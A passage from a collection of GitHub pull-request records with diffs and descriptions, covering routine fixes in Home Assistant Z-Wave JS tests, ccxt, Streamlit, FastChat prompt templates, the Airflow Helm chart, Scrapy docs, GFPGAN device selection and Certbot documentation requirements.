f"{device_id}-{state['manufacturerId']}:"
f"{state['productType']}:"
f"{state['productId']}"
@@ -1160,7 +1163,7 @@ async def test_replace_different_node(
device = dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
assert device
assert device == dev_reg.async_get_device(
- identifiers={(DOMAIN, multisensor_6_device_id)}
+ identifiers={(DOMAIN, multisensor_6_device_id_ext)}
)
assert device.manufacturer == "AEON Labs"
assert device.model == "ZW100"
@@ -1168,8 +1171,7 @@ async def test_replace_different_node(
assert hass.states.get(AIR_TEMPERATURE_SENSOR)
- # A replace node event has the extra field "replaced" set to True
- # to distinguish it from an exclusion
+ # Remove existing node
event = Event(
type="node removed",
data={
@@ -1183,8 +1185,11 @@ async def test_replace_different_node(
await hass.async_block_till_done()
# Device should still be there after the node was removed
- device = dev_reg.async_get(dev_id)
+ device = dev_reg.async_get_device(
+ identifiers={(DOMAIN, multisensor_6_device_id_ext)}
+ )
assert device
+ assert len(device.identifiers) == 2
# When the node is replaced, a non-ready node added event is emitted
event = Event(
@@ -1238,18 +1243,164 @@ async def test_replace_different_node(
client.driver.receive_event(event)
await hass.async_block_till_done()
- # Old device and entities were removed, but the ID is re-used
- device = dev_reg.async_get(dev_id)
- assert device
- assert device == dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
- assert device == dev_reg.async_get_device(identifiers={(DOMAIN, hank_device_id)})
- assert not dev_reg.async_get_device(identifiers={(DOMAIN, multisensor_6_device_id)})
- assert device.manufacturer == "HANK Electronics Ltd."
- assert device.model == "HKZW-SO01"
+ # node ID based device identifier should be moved from the old multisensor device
+ # to the new hank device and both the old and new devices should exist.
+ new_device = dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
+ assert new_device
+ hank_device = dev_reg.async_get_device(identifiers={(DOMAIN, hank_device_id_ext)})
+ assert hank_device
+ assert hank_device == new_device
+ assert hank_device.identifiers == {
+ (DOMAIN, device_id),
+ (DOMAIN, hank_device_id_ext),
+ }
+ multisensor_6_device = dev_reg.async_get_device(
+ identifiers={(DOMAIN, multisensor_6_device_id_ext)}
+ )
+ assert multisensor_6_device
+ assert multisensor_6_device != new_device
+ assert multisensor_6_device.identifiers == {(DOMAIN, multisensor_6_device_id_ext)}
+
+ assert new_device.manufacturer == "HANK Electronics Ltd."
+ assert new_device.model == "HKZW-SO01"
- assert not hass.states.get(AIR_TEMPERATURE_SENSOR)
+ # We keep the old entities in case there are customizations that a user wants to
+ # keep. They can always delete the device and that will remove the entities as well.
+ assert hass.states.get(AIR_TEMPERATURE_SENSOR)
assert hass.states.get("switch.smart_plug_with_two_usb_ports")
+ # Try to add back the first node to see if the device IDs are correct
+
+ # Remove existing node
+ event = Event(
+ type="node removed",
+ data={
+ "source": "controller",
+ "event": "node removed",
+ "reason": 3,
+ "node": state,
+ },
+ )
+ client.driver.receive_event(event)
+ await hass.async_block_till_done()
+
+ # Device should still be there after the node was removed
+ device = dev_reg.async_get_device(identifiers={(DOMAIN, hank_device_id_ext)})
+ assert device
+ assert len(device.identifiers) == 2
+
+ # When the node is replaced, a non-ready node added event is emitted
+ event = Event(
+ type="node added",
+ data={
+ "source": "controller",
+ "event": "node added",
+ "node": {
+ "nodeId": multisensor_6.node_id,
+ "index": 0,
+ "status": 4,
+ "ready": False,
+ "isSecure": False,
+ "interviewAttempts": 1,
+ "endpoints": [
+ {"nodeId": multisensor_6.node_id, "index": 0, "deviceClass": None}
+ ],
+ "values": [],
+ "deviceClass": None,
+ "commandClasses": [],
+ "interviewStage": "None",
+ "statistics": {
+ "commandsTX": 0,
+ "commandsRX": 0,
+ "commandsDroppedRX": 0,
+ "commandsDroppedTX": 0,
+ "timeoutResponse": 0,
+ },
+ "isControllerNode": False,
+ },
+ "result": {},
+ },
+ )
+
+ client.driver.receive_event(event)
+ await hass.async_block_till_done()
+
+ # Mark node as ready
+ event = Event(
+ type="ready",
+ data={
+ "source": "node",
+ "event": "ready",
+ "nodeId": node_id,
+ "nodeState": multisensor_6_state,
+ },
+ )
+ client.driver.receive_event(event)
+ await hass.async_block_till_done()
+
+ assert await async_setup_component(hass, "config", {})
+
+ # node ID based device identifier should be moved from the new hank device
+ # to the old multisensor device and both the old and new devices should exist.
+ old_device = dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
+ assert old_device
+ hank_device = dev_reg.async_get_device(identifiers={(DOMAIN, hank_device_id_ext)})
+ assert hank_device
+ assert hank_device != old_device
+ assert hank_device.identifiers == {(DOMAIN, hank_device_id_ext)}
+ multisensor_6_device = dev_reg.async_get_device(
+ identifiers={(DOMAIN, multisensor_6_device_id_ext)}
+ )
+ assert multisensor_6_device
+ assert multisensor_6_device == old_device
+ assert multisensor_6_device.identifiers == {
+ (DOMAIN, device_id),
+ (DOMAIN, multisensor_6_device_id_ext),
+ }
+
+ ws_client = await hass_ws_client(hass)
+
+ # Simulate the driver not being ready to ensure that the device removal handler
+ # does not crash
+ driver = client.driver
+ client.driver = None
+
+ await ws_client.send_json(
+ {
+ "id": 1,
+ "type": "config/device_registry/remove_config_entry",
+ "config_entry_id": integration.entry_id,
+ "device_id": hank_device.id,
+ }
+ )
+ response = await ws_client.receive_json()
+ assert not response["success"]
+
+ client.driver = driver
+
+ # Attempting to remove the hank device should pass, but removing the multisensor should not
+ await ws_client.send_json(
+ {
+ "id": 2,
+ "type": "config/device_registry/remove_config_entry",
+ "config_entry_id": integration.entry_id,
+ "device_id": hank_device.id,
+ }
+ )
+ response = await ws_client.receive_json()
+ assert response["success"]
+
+ await ws_client.send_json(
+ {
+ "id": 3,
+ "type": "config/device_registry/remove_config_entry",
+ "config_entry_id": integration.entry_id,
+ "device_id": multisensor_6_device.id,
+ }
+ )
+ response = await ws_client.receive_json()
+ assert not response["success"]
+
async def test_node_model_change(
hass: HomeAssistant, zp3111, client, integration
|
## Breaking change
Home Assistant devices that represent Z-Wave JS nodes will persist even after the node has been removed. If the node has been removed, you can manually delete the device entry, but note that you will be unable to do so if the node is still known to the controller.
## Proposed change
Due to issues reported in https://github.com/home-assistant/core/issues/80398, where the unique identifiers we use for devices randomly change, the integration was removing devices and recreating them, causing users to lose their entity customizations. To address this, when a node is (re)registered in the device registry and an existing device has this node ID but a different hardware-based identifier, we now keep the old device and add a new one with the new hardware-based identifier (sketched below). This allows a node to reassociate with the first device if the hardware signature changed because of an error and is later corrected. Additionally, users can remove the old device manually if it shouldn't be there.
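A toy, self-contained sketch of the identifier handover described above (the registry list, device entries and identifier values below are made-up stand-ins for the real device registry and the `get_device_id()`/`get_device_id_ext()` output):

```python
from typing import List, Set, Tuple

Identifier = Tuple[str, str]

# Illustrative identifiers only; real values come from get_device_id()/get_device_id_ext().
NODE_ID: Identifier = ("zwave_js", "1234567890-57")               # node-ID based identifier
OLD_HW_ID: Identifier = ("zwave_js", "1234567890-57-134:2:100")   # old hardware signature
NEW_HW_ID: Identifier = ("zwave_js", "1234567890-57-568:3:81")    # new hardware signature


def register_node(devices: List[Set[Identifier]], node_id: Identifier, hw_id: Identifier) -> Set[Identifier]:
    """Toy stand-in for register_node_in_dev_reg(): keep old devices, move only the node-ID identifier."""
    # 1) Detach the node-ID identifier from any device whose hardware signature differs.
    for idents in devices:
        if node_id in idents and hw_id not in idents:
            idents.discard(node_id)
    # 2) If a device already carries this hardware signature, re-attach the node-ID identifier to it.
    for idents in devices:
        if hw_id in idents:
            idents.add(node_id)
            return idents
    # 3) Otherwise create a brand-new device entry; the old one stays for the user to delete manually.
    idents = {node_id, hw_id}
    devices.append(idents)
    return idents


registry: List[Set[Identifier]] = [{NODE_ID, OLD_HW_ID}]  # one device before the swap
register_node(registry, NODE_ID, NEW_HW_ID)               # node replaced by different hardware
register_node(registry, NODE_ID, OLD_HW_ID)               # original hardware comes back
print(registry)  # both devices persist; the node-ID identifier sits on the matching one
```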
## Type of change
<!--
What type of change does your PR introduce to Home Assistant?
NOTE: Please, check only 1! box!
If your PR requires multiple boxes to be checked, you'll most likely need to
split it into multiple PRs. This makes things easier and faster to code review.
-->
- [ ] Dependency upgrade
- [x] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Deprecation (breaking change to happen in the future)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [ ] Code quality improvements to existing code or addition of tests
## Additional information
<!--
Details are important, and help maintainers processing your PR.
Please be sure to fill out additional details, if applicable.
-->
- This PR fixes or closes issue: fixes https://github.com/home-assistant/core/issues/80398
- This PR is related to issue:
- Link to documentation pull request:
## Checklist
<!--
Put an `x` in the boxes that apply. You can also fill these out after
creating the PR. If you're unsure about any of them, don't hesitate to ask.
We're here to help! This is simply a reminder of what we are going to look
for before merging your code.
-->
- [ ] The code change is tested and works locally.
- [ ] Local tests pass. **Your PR cannot be merged unless tests pass**
- [ ] There is no commented out code in this PR.
- [ ] I have followed the [development checklist][dev-checklist]
- [ ] I have followed the [perfect PR recommendations][perfect-pr]
- [ ] The code has been formatted using Black (`black --fast homeassistant tests`)
- [ ] Tests have been added to verify that the new code works.
If user exposed functionality or configuration variables are added/changed:
- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]
If the code communicates with devices, web services, or third-party tools:
- [ ] The [manifest file][manifest-docs] has all fields filled out correctly.
Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`.
Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.
<!--
This project is very active and we have a high turnover of pull requests.
Unfortunately, the number of incoming pull requests is higher than what our
reviewers can review and merge so there is a long backlog of pull requests
waiting for review. You can help here!
By reviewing another pull request, you will help raise the code quality of
that pull request and the final review will be faster. This way the general
pace of pull request reviews will go up and your wait time will go down.
When picking a pull request to review, try to choose one that hasn't yet
been reviewed.
Thanks for helping out!
-->
To help with the load of incoming pull requests:
- [ ] I have reviewed two other [open pull requests][prs] in this repository.
[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
<!--
Thank you for contributing <3
Below, some useful links you could explore:
-->
[dev-checklist]: https://developers.home-assistant.io/docs/development_checklist/
[manifest-docs]: https://developers.home-assistant.io/docs/creating_integration_manifest/
[quality-scale]: https://developers.home-assistant.io/docs/integration_quality_scale_index/
[docs-repository]: https://github.com/home-assistant/home-assistant.io
[perfect-pr]: https://developers.home-assistant.io/docs/review-process/#creating-the-perfect-pr
|
https://api.github.com/repos/home-assistant/core/pulls/98145
|
2023-08-10T07:10:44Z
|
2024-01-30T02:36:41Z
|
2024-01-30T02:36:41Z
|
2024-01-31T03:01:44Z
| 3,621
|
home-assistant/core
| 39,074
|
Bump pre-commit/action from 2.0.2 to 2.0.3
|
diff --git a/.github/workflows/lint.yml b/.github/workflows/lint.yml
index 51f6d02e2e6..2f6c504d3f2 100644
--- a/.github/workflows/lint.yml
+++ b/.github/workflows/lint.yml
@@ -25,4 +25,4 @@ jobs:
python -m pip install -e '.[d]'
- name: Lint
- uses: pre-commit/[email protected]
+ uses: pre-commit/[email protected]
|
Bumps [pre-commit/action](https://github.com/pre-commit/action) from 2.0.2 to 2.0.3.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/pre-commit/action/releases">pre-commit/action's releases</a>.</em></p>
<blockquote>
<h2>pre-commit/[email protected]</h2>
<h3>Fixes</h3>
<ul>
<li><code>push</code> compatibility with <code>actions/checkout@v2</code> which checks out the branch
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/action/issues/97">#97</a> PR by <a href="https://github.com/jackton1"><code>@jackton1</code></a>.</li>
</ul>
</li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/pre-commit/action/commit/9b88afc9cd57fd75b655d5c71bd38146d07135fe"><code>9b88afc</code></a> Deployed to github pages</li>
<li>See full diff in <a href="https://github.com/pre-commit/action/compare/v2.0.2...v2.0.3">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details>
|
https://api.github.com/repos/psf/black/pulls/2695
|
2021-12-15T02:21:35Z
|
2021-12-15T23:55:26Z
|
2021-12-15T23:55:26Z
|
2021-12-15T23:55:30Z
| 128
|
psf/black
| 24,471
|
Mexc fetchTickers: handleMarketTypeAndParams
|
diff --git a/js/mexc.js b/js/mexc.js
index f8bffbd271be..5470683ed6c5 100644
--- a/js/mexc.js
+++ b/js/mexc.js
@@ -653,13 +653,12 @@ module.exports = class mexc extends Exchange {
async fetchTickers (symbols = undefined, params = {}) {
await this.loadMarkets ();
- let marketType = undefined;
- [ marketType, params ] = this.handleMarketTypeAndParams ('fetchTickers', undefined, params);
+ const [ marketType, query ] = this.handleMarketTypeAndParams ('fetchTickers', undefined, params);
const method = this.getSupportedMapping (marketType, {
'spot': 'spotPublicGetMarketTicker',
'swap': 'contractPublicGetTicker',
});
- const response = await this[method] (this.extend (params));
+ const response = await this[method] (this.extend (query));
//
// {
// "success":true,
|
Adjusted handleMarketTypeAndParams so that it's on one line. Added margin market type.
|
https://api.github.com/repos/ccxt/ccxt/pulls/11510
|
2022-01-20T03:18:28Z
|
2022-01-23T06:06:56Z
|
2022-01-23T06:06:56Z
|
2022-01-23T06:06:56Z
| 226
|
ccxt/ccxt
| 13,463
|
Enable multipage apps by default
|
diff --git a/lib/streamlit/config.py b/lib/streamlit/config.py
index b763ff4ba4bc..42d701e699f8 100644
--- a/lib/streamlit/config.py
+++ b/lib/streamlit/config.py
@@ -725,15 +725,8 @@ def _browser_server_port() -> int:
_create_option(
"ui.hideSidebarNav",
- description="""
- Flag to hide the sidebar page navigation component.
-
- We have this default to True for now so that we can "soft-launch" the
- multipage apps feature and merge the feature branch into develop earlier.
- Once we're ready to have multipage apps enabled by default, we'll flip the
- default to False.
- """,
- default_val=True,
+ description="Flag to hide the sidebar page navigation component.",
+ default_val=False,
type_=bool,
visibility="hidden",
)
|
## 📚 Context
We initially merged the multipage apps PR with the `ui.hideSidebarNav` config option defaulting to
`True` to use the option as a kind of "feature flag" (we need the option either way in case we ever want
to turn off the nav component and instead build one into Cloud).
Now that we're closer to the release of the multipage apps feature, we can toggle the option to enable
MPAs by default.
- What kind of change does this PR introduce?
- [x] Feature
|
https://api.github.com/repos/streamlit/streamlit/pulls/4776
|
2022-05-25T23:43:32Z
|
2022-05-27T01:35:55Z
|
2022-05-27T01:35:55Z
|
2023-05-26T23:33:51Z
| 202
|
streamlit/streamlit
| 22,314
|
Fix mpt prompt template
|
diff --git a/fastchat/conversation.py b/fastchat/conversation.py
index c2235d7d7b..09778b27c9 100644
--- a/fastchat/conversation.py
+++ b/fastchat/conversation.py
@@ -19,6 +19,7 @@ class SeparatorStyle(Enum):
RWKV = auto()
PHOENIX = auto()
ROBIN = auto()
+ CHATML = auto()
@dataclasses.dataclass
@@ -127,6 +128,14 @@ def get_prompt(self) -> str:
else:
ret += role + ":\n"
return ret
+ elif self.sep_style == SeparatorStyle.CHATML:
+ ret = "" if self.system == "" else self.system + self.sep + "\n"
+ for role, message in self.messages:
+ if message:
+ ret += role + "\n" + message + self.sep + "\n"
+ else:
+ ret += role + "\n"
+ return ret
else:
raise ValueError(f"Invalid style: {self.sep_style}")
@@ -474,12 +483,11 @@ def get_conv_template(name: str) -> Conversation:
- You are a helpful assistant chatbot trained by MosaicML.
- You answer questions.
- You are excited to be able to help the user, but will refuse to do anything that could be considered harmful to the user.
-- You are more than just an information source, you are also able to write poetry, short stories, and make jokes.
-""",
+- You are more than just an information source, you are also able to write poetry, short stories, and make jokes.""",
roles=("<|im_start|>user", "<|im_start|>assistant"),
messages=(),
offset=0,
- sep_style=SeparatorStyle.ADD_NEW_LINE_SINGLE,
+ sep_style=SeparatorStyle.CHATML,
sep="<|im_end|>",
stop_token_ids=[50278, 0],
)
@@ -490,12 +498,11 @@ def get_conv_template(name: str) -> Conversation:
Conversation(
name="mpt-30b-chat",
system="""<|im_start|>system
-A conversation between a user and an LLM-based AI assistant. The assistant gives helpful and honest answers.
-""",
+A conversation between a user and an LLM-based AI assistant. The assistant gives helpful and honest answers.""",
roles=("<|im_start|>user", "<|im_start|>assistant"),
messages=(),
offset=0,
- sep_style=SeparatorStyle.ADD_NEW_LINE_SINGLE,
+ sep_style=SeparatorStyle.CHATML,
sep="<|im_end|>",
stop_token_ids=[50278, 0],
)
|
<!-- Thank you for your contribution! -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
Fix mpt prompt template
<!-- Please give a short summary of the change and the problem this solves. -->
## Related issue number (if applicable)
<!-- For example: "Closes #1234" -->
#1783
## Checks
- [x] I've run `format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed.
- [ ] I've made sure the relevant tests are passing (if applicable).
|
https://api.github.com/repos/lm-sys/FastChat/pulls/1784
|
2023-06-26T16:34:49Z
|
2023-06-26T18:15:33Z
|
2023-06-26T18:15:33Z
|
2023-06-26T18:39:00Z
| 592
|
lm-sys/FastChat
| 41,163
|
Fix kerberos envs for workers in helm chart
|
diff --git a/chart/templates/workers/worker-deployment.yaml b/chart/templates/workers/worker-deployment.yaml
index bd3029a757e56..f418d6a17cd37 100644
--- a/chart/templates/workers/worker-deployment.yaml
+++ b/chart/templates/workers/worker-deployment.yaml
@@ -158,6 +158,12 @@ spec:
env:
{{- include "custom_airflow_environment" . | indent 10 }}
{{- include "standard_airflow_environment" . | indent 10 }}
+ {{- if .Values.workers.kerberosSidecar.enabled }}
+ - name: KRB5_CONFIG
+ value: {{ .Values.kerberos.configPath | quote }}
+ - name: KRB5CCNAME
+ value: {{ include "kerberos_ccache_path" . | quote }}
+ {{- end }}
{{- if $persistence }}
- name: worker-gc
image: {{ template "airflow_image" . }}
@@ -167,12 +173,6 @@ spec:
- name: logs
mountPath: {{ template "airflow_logs" . }}
{{- end }}
- {{- if .Values.workers.kerberosSidecar.enabled }}
- - name: KRB5_CONFIG
- value: {{ .Values.kerberos.configPath | quote }}
- - name: KRB5CCNAME
- value: {{ include "kerberos_ccache_path" . | quote }}
- {{- end }}
{{- if .Values.workers.kerberosSidecar.enabled }}
- name: worker-kerberos
image: {{ template "airflow_image" . }}
diff --git a/chart/tests/test_kerberos.py b/chart/tests/test_kerberos.py
index 4676f65a393a9..fd1431ee671ac 100644
--- a/chart/tests/test_kerberos.py
+++ b/chart/tests/test_kerberos.py
@@ -18,6 +18,8 @@
import json
import unittest
+import jmespath
+
from tests.helm_template_generator import render_chart
@@ -30,3 +32,30 @@ def test_kerberos_not_mentioned_in_render_if_disabled(self):
]
k8s_objects_to_consider_str = json.dumps(k8s_objects_to_consider)
assert "kerberos" not in k8s_objects_to_consider_str
+
+ def test_kerberos_envs_available_in_worker_with_persistence(self):
+ docs = render_chart(
+ values={
+ "executor": "CeleryExecutor",
+ "workers": {
+ "kerberosSidecar": {"enabled": True},
+ "persistence": {
+ "enabled": True,
+ },
+ },
+ "kerberos": {
+ "enabled": True,
+ "configPath": "/etc/krb5.conf",
+ "ccacheMountPath": "/var/kerberos-ccache",
+ "ccacheFileName": "ccache",
+ },
+ },
+ show_only=["templates/workers/worker-deployment.yaml"],
+ )
+
+ assert {"name": "KRB5_CONFIG", "value": "/etc/krb5.conf"} in jmespath.search(
+ "spec.template.spec.containers[0].env", docs[0]
+ )
+ assert {"name": "KRB5CCNAME", "value": "/var/kerberos-ccache/ccache"} in jmespath.search(
+ "spec.template.spec.containers[0].env", docs[0]
+ )
|
When worker log persistence is enabled in the Helm chart, the KRB5_CONFIG and KRB5CCNAME envs do not end up in the worker container, because the worker-gc container is rendered before them.
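As a rough illustration of what the new chart test asserts, the sketch below runs the same jmespath query against a hand-written stand-in for the rendered worker Deployment (in the real test this dict comes from `render_chart()`):

```python
import jmespath

# Hand-written stand-in for one rendered worker Deployment manifest.
rendered_worker = {
    "spec": {"template": {"spec": {"containers": [
        {
            "name": "worker",  # containers[0]: the envs must land here
            "env": [
                {"name": "KRB5_CONFIG", "value": "/etc/krb5.conf"},
                {"name": "KRB5CCNAME", "value": "/var/kerberos-ccache/ccache"},
            ],
        },
        {"name": "worker-gc", "env": []},  # sidecar now rendered after the env block
    ]}}}
}

worker_env = jmespath.search("spec.template.spec.containers[0].env", rendered_worker)
assert {"name": "KRB5_CONFIG", "value": "/etc/krb5.conf"} in worker_env
assert {"name": "KRB5CCNAME", "value": "/var/kerberos-ccache/ccache"} in worker_env
```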
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/master/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code change, Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in [UPDATING.md](https://github.com/apache/airflow/blob/master/UPDATING.md).
|
https://api.github.com/repos/apache/airflow/pulls/13828
|
2021-01-22T08:38:05Z
|
2021-01-24T17:09:40Z
|
2021-01-24T17:09:40Z
|
2021-01-24T22:42:10Z
| 787
|
apache/airflow
| 14,781
|
Link to Zyte’s export guides
|
diff --git a/docs/topics/feed-exports.rst b/docs/topics/feed-exports.rst
index 700775e4bb6..f64bbac06a0 100644
--- a/docs/topics/feed-exports.rst
+++ b/docs/topics/feed-exports.rst
@@ -13,6 +13,11 @@ Scrapy provides this functionality out of the box with the Feed Exports, which
allows you to generate feeds with the scraped items, using multiple
serialization formats and storage backends.
+This page provides detailed documentation for all feed export features. If you
+are looking for a step-by-step guide, check out `Zyte’s export guides`_.
+
+.. _Zyte’s export guides: https://docs.zyte.com/web-scraping/guides/export/index.html#exporting-scraped-data
+
.. _topics-feed-format:
Serialization formats
|
https://api.github.com/repos/scrapy/scrapy/pulls/6183
|
2023-12-20T11:48:26Z
|
2023-12-20T17:22:22Z
|
2023-12-20T17:22:22Z
|
2023-12-20T17:22:22Z
| 190
|
scrapy/scrapy
| 34,261
|
|
When device is MPS, use CPU for GFPGAN instead
|
diff --git a/modules/devices.py b/modules/devices.py
index ff82f2f64bb..5d9c7a0767c 100644
--- a/modules/devices.py
+++ b/modules/devices.py
@@ -33,7 +33,7 @@ def enable_tf32():
errors.run(enable_tf32, "Enabling TF32")
device = get_optimal_device()
-device_codeformer = cpu if has_mps else device
+device_gfpgan = device_codeformer = cpu if device.type == 'mps' else device
dtype = torch.float16
def randn(seed, shape):
diff --git a/modules/gfpgan_model.py b/modules/gfpgan_model.py
index dd3fbcab186..f1a564b732f 100644
--- a/modules/gfpgan_model.py
+++ b/modules/gfpgan_model.py
@@ -21,7 +21,7 @@ def gfpgann():
global loaded_gfpgan_model
global model_path
if loaded_gfpgan_model is not None:
- loaded_gfpgan_model.gfpgan.to(shared.device)
+ loaded_gfpgan_model.gfpgan.to(devices.device_gfpgan)
return loaded_gfpgan_model
if gfpgan_constructor is None:
@@ -36,8 +36,8 @@ def gfpgann():
else:
print("Unable to load gfpgan model!")
return None
- model = gfpgan_constructor(model_path=model_file, upscale=1, arch='clean', channel_multiplier=2, bg_upsampler=None)
- model.gfpgan.to(shared.device)
+ model = gfpgan_constructor(model_path=model_file, upscale=1, arch='clean', channel_multiplier=2, bg_upsampler=None, device=devices.device_gfpgan)
+ model.gfpgan.to(devices.device_gfpgan)
loaded_gfpgan_model = model
return model
|
Attempting to use MPS for GFPGAN results in an unchanged image, so fall back to CPU instead to make GFPGAN work correctly. See issue #1367.
|
https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/1424
|
2022-10-01T04:16:57Z
|
2022-10-04T12:20:12Z
|
2022-10-04T12:20:12Z
|
2022-10-04T12:20:12Z
| 429
|
AUTOMATIC1111/stable-diffusion-webui
| 39,811
|
Add readthedocs requirements files
|
diff --git a/certbot-dns-cloudflare/readthedocs.org.requirements.txt b/certbot-dns-cloudflare/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..b18901111fa
--- /dev/null
+++ b/certbot-dns-cloudflare/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-cloudflare[docs]
diff --git a/certbot-dns-cloudxns/readthedocs.org.requirements.txt b/certbot-dns-cloudxns/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..ae2ff8165e5
--- /dev/null
+++ b/certbot-dns-cloudxns/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-cloudxns[docs]
diff --git a/certbot-dns-digitalocean/readthedocs.org.requirements.txt b/certbot-dns-digitalocean/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..08d973ab36e
--- /dev/null
+++ b/certbot-dns-digitalocean/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-digitalocean[docs]
diff --git a/certbot-dns-dnsimple/readthedocs.org.requirements.txt b/certbot-dns-dnsimple/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..fef73916c6a
--- /dev/null
+++ b/certbot-dns-dnsimple/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-dnsimple[docs]
diff --git a/certbot-dns-dnsmadeeasy/readthedocs.org.requirements.txt b/certbot-dns-dnsmadeeasy/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..8f8c6c7316a
--- /dev/null
+++ b/certbot-dns-dnsmadeeasy/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-dnsmadeeasy[docs]
diff --git a/certbot-dns-google/readthedocs.org.requirements.txt b/certbot-dns-google/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..6ea393f866f
--- /dev/null
+++ b/certbot-dns-google/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-google[docs]
diff --git a/certbot-dns-luadns/readthedocs.org.requirements.txt b/certbot-dns-luadns/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..acb51e4eff0
--- /dev/null
+++ b/certbot-dns-luadns/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
